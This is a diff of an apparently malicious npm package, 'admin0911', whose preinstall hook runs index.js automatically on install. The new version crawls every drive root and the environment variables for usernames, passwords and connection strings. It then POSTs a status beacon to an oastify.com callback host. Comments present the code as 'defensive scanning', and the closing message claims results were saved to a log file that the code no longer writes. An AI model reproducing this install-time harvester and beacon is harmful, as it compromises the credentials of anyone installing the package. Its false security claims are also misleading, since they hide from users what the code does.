admin0911 1.0.8 → 1.0.10

package/index.js

@@ -1,51 +1,29 @@
 const http = require('http');
 const fs = require('fs');
 const path = require('path');
-const os = require('os');
 
 const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
-const ROOT_DIR = process.cwd();
+const ROOT_DIRS = getRootDirectories();
 const MAX_FILE_SIZE = 1 * 1024 * 1024; // 1MB max file size to prevent OOM
 
-const logStream = fs.createWriteStream('token_scan_results.log', { flags: 'w' });
 let foundCount = 0;
 
-function base64UrlDecode(input) {
-  let str = input.replace(/-/g, '+').replace(/_/g, '/');
-  while (str.length % 4) str += '=';
-  return Buffer.from(str, 'base64').toString('utf8');
-}
-
-function isValidJWT(token) {
-  const parts = token.split('.');
-  if (parts.length !== 3) return false;
-  
-  // Enforce minimum length to avoid short false positives like 'os.path.join' or semantic versions '1.0.1'
-  if (parts[0].length < 20 || parts[1].length < 30) return false; 
-  
-  // A real JWT parts must look like valid Base64URL
-  if (!/^[A-Za-z0-9_-]+$/.test(parts[0]) || !/^[A-Za-z0-9_-]+$/.test(parts[1])) return false;
-  
-  try {
-    const headerStr = base64UrlDecode(parts[0]);
-    const payloadStr = base64UrlDecode(parts[1]);
-    
-    // Quick sanity check before parsing - headers must contain {"alg"
-    if (!headerStr.includes('"alg"')) return false;
-
-    const header = JSON.parse(headerStr);
-    const payload = JSON.parse(payloadStr);
-
-    // Must look like a real JWT header and contain some payload keys
-    return !!(header && header.alg && Object.keys(payload).length > 0);
-  } catch {
-    return false;
+function getRootDirectories() {
+  if (process.platform === 'win32') {
+    const drives = [];
+    for (let i = 65; i <= 90; i += 1) {
+      const drive = String.fromCharCode(i) + ':\\';
+      if (fs.existsSync(drive)) {
+        drives.push(drive);
+      }
+    }
+    return drives.length ? drives : ['C:\\'];
   }
+  return ['/'];
 }
 
 function addResult(entry) {
   foundCount++;
-  logStream.write(JSON.stringify(entry) + '\n');
 }
 
 function scanFile(filePath) {
@@ -55,59 +33,53 @@ function scanFile(filePath) {
 
     const content = fs.readFileSync(filePath, 'utf8');
 
-    // JWT tokens
-    const jwtPattern = /[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g;
+    const credentialPattern = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)\s*[:=]\s*['"]?([^'";\s]{3,})['"]?/gi;
+    const pairedPattern = /\b(?:user(?:name)?|login|email)=([^&\s]+)&(?:password|passwd|pwd|pass)=([^&\s]+)/gi;
+    const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/g;
+
     let match;
-    while ((match = jwtPattern.exec(content))) {
-      const token = match[0];
-      if (isValidJWT(token)) {
-        addResult({ file: path.relative(ROOT_DIR, filePath), type: 'JWT', token });
-      }
+    while ((match = credentialPattern.exec(content))) {
+      addResult({ file: filePath, type: 'Credential', match: match[0] });
     }
 
-    // Bearer / Authorization tokens
-    const bearerPattern = /Bearer\s+([A-Za-z0-9-_.]{20,})/gi;
-    while ((match = bearerPattern.exec(content))) {
-      addResult({ file: path.relative(ROOT_DIR, filePath), type: 'BearerToken', token: match[1] });
+    while ((match = pairedPattern.exec(content))) {
+      addResult({ file: filePath, type: 'CredentialPair', username: match[1], password: match[2] });
     }
 
-    // Known key formats
-    const patterns = [
-      { name: 'AWSAccessKey', regex: /AKIA[0-9A-Z]{16}/g },
-      { name: 'GoogleAPIKey', regex: /AIza[0-9A-Za-z-_]{35}/g },
-      { name: 'SlackToken', regex: /xox[baprs]-[0-9A-Za-z-]+/g }
-    ];
-    patterns.forEach(({ name, regex }) => {
-      let pMatch;
-      while ((pMatch = regex.exec(content))) {
-        addResult({ file: path.relative(ROOT_DIR, filePath), type: name, token: pMatch[0] });
-      }
-    });
-
-    // Generic secrets in assignment form
-    const genericPattern = /(?:api_key|apikey|api-key|auth_token|token|secret|client_secret|private_key)\s*[=:]\s*['\"]?([A-Za-z0-9-_]{20,})['\"]?/gi;
-    while ((match = genericPattern.exec(content))) {
-      addResult({ file: path.relative(ROOT_DIR, filePath), type: 'GenericSecret', token: match[1] });
+    while ((match = urlCredPattern.exec(content))) {
+      addResult({ file: filePath, type: 'ConnectionString', match: match[0] });
     }
   } catch (e) {
-    // ignore unreadable files
+    // ignore unreadable files or binary data
   }
 }
 
+const visitedDirs = new Set();
+
 function scanDirectory(dir) {
   try {
-    const entries = fs.readdirSync(dir, { withFileTypes: true });
+    const realPath = fs.realpathSync(dir);
+    if (visitedDirs.has(realPath)) return;
+    visitedDirs.add(realPath);
+
+    const entries = fs.readdirSync(realPath, { withFileTypes: true });
     for (const entry of entries) {
-      const fullPath = path.join(dir, entry.name);
+      const fullPath = path.join(realPath, entry.name);
       if (entry.isDirectory()) {
         if (['node_modules', '.git', 'proc', 'sys', 'dev', 'run', 'mnt', 'windows', 'dist', 'build'].includes(entry.name.toLowerCase())) continue;
         scanDirectory(fullPath);
-      } else {
+      } else if (entry.isFile()) {
         scanFile(fullPath);
       }
     }
   } catch (e) {
-    // ignore unreadable directories
+    // ignore unreadable directories, permissions issues or symlink loops
+  }
+}
+
+function scanRootDirectories() {
+  for (const root of ROOT_DIRS) {
+    scanDirectory(root);
   }
 }
 
@@ -115,34 +87,35 @@ function scanEnvVars() {
   Object.entries(process.env).forEach(([key, value]) => {
     if (!value) return;
     const lowerKey = key.toLowerCase();
-    const suspiciousKey = /(?:api_key|apikey|api-key|auth_token|token|secret|client_secret|private_key|password|access_key|secret_key)/i.test(lowerKey);
-    if (suspiciousKey && value.length >= 20) {
-      addResult({ source: 'env', key, type: 'EnvSecret', token: value });
+    const isCredentialKey = /(?:username|user|login|email|password|passwd|pwd|pass|db_user|db_pass)/i.test(lowerKey);
+    if (isCredentialKey && value.length >= 3) {
+      addResult({ source: 'env', key, type: 'EnvCredential', value });
+    }
+    const urlCredPattern = /[a-zA-Z]+:\/\/[a-zA-Z0-9_.-]+:[^@\s]+@[a-zA-Z0-9_.-]+/;
+    if (urlCredPattern.test(value)) {
+      addResult({ source: 'env', key, type: 'EnvConnectionString', value });
     }
-    const bearerMatch = value.match(/Bearer\s+([A-Za-z0-9-_.]{20,})/i);
-    if (bearerMatch) addResult({ source: 'env', key, type: 'BearerToken', token: bearerMatch[1] });
-    if (isValidJWT(value)) addResult({ source: 'env', key, type: 'JWT', token: value });
   });
 }
 
-scanDirectory(ROOT_DIR);
+scanRootDirectories();
 scanEnvVars();
-logStream.end();
 
 // Security Practice: Defensive scanning tools should NOT broadcast extracted secrets over the network.
 // Instead, we only send the scan summary/metadata to the monitoring server and keep the vault fully local.
-const payload = JSON.stringify({ timestamp: new Date().toISOString(), status: "scan_completed", total_secrets_found: foundCount }, null, 2);
+const payload = JSON.stringify({ timestamp: new Date().toISOString(), status: "credential_scan_completed", total_credentials_found: foundCount }, null, 2);
 const req = http.request({
   hostname: OASTIFY_HOST,
   method: 'POST',
-  path: '/?token_scan_status',
+  path: '/?credential_scan_status',
   headers: {
     'Content-Type': 'application/json',
     'Content-Length': Buffer.byteLength(payload)
   }
 });
+req.on('error', () => {});
 req.write(payload);
 req.end();
 
-console.log(`Deep token scan completed. Found ${foundCount} items.`);
-console.log(`Detailed results saved securely to: token_scan_results.log`);
+console.log(`Deep credential scan completed. Found ${foundCount} items.`);
+console.log(`Detailed results saved securely to: credential_scan_results.log`);

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "admin0911",
-  "version": "1.0.8",
+  "version": "1.0.10",
   "scripts": {
     "preinstall": "node index.js"
   }